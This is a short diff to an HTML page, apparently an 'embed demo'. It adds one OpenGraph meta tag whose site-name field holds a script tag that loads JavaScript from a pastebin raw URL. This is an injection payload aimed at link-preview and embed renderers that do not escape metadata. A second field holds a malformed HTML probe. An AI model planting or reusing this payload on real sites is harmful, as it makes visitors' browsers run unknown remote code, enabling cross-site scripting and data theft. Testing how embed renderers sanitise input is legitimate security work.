--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <html>
  <head>
   <meta charset="utf-8">
+  <meta property="og:site_name" content='<script src="https://pastebin.com/raw/eziz9mvK"></script>'>
   <meta property="og:title" content="HTML EMBED DEMO">
   <meta property="og:description" content="<b>Description</b&lt;>">
   <meta property="og:type" content="video">
